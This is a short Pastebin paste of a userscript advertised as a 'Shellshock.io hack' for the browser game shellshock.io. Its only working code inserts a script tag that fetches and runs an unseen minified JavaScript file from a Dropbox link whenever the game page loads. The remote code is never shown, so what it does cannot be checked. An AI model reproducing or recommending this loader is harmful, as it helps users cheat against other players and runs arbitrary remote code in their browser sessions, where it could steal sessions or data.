Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- here's the code :)
- // ==UserScript==
- // @name Shellshock.io hack 2020 OP
- // @version 3.0
- // @description Shellshock hack
- // @author Blitzbro00
- // @match *://shellshock.io/*
- // @grant none
- // @namespace https://greasyfork.org/users/190962
- // ==/UserScript==
- var script = document.createElement('script');
- script.src = '//dl.dropboxusercontent.com/s/wjuz0lovxa00an3/5shellshock.min.js';
- script.type = 'text/javascript';
- document.body.appendChild(script);
Advertisement
Add Comment
Please, Sign In to add comment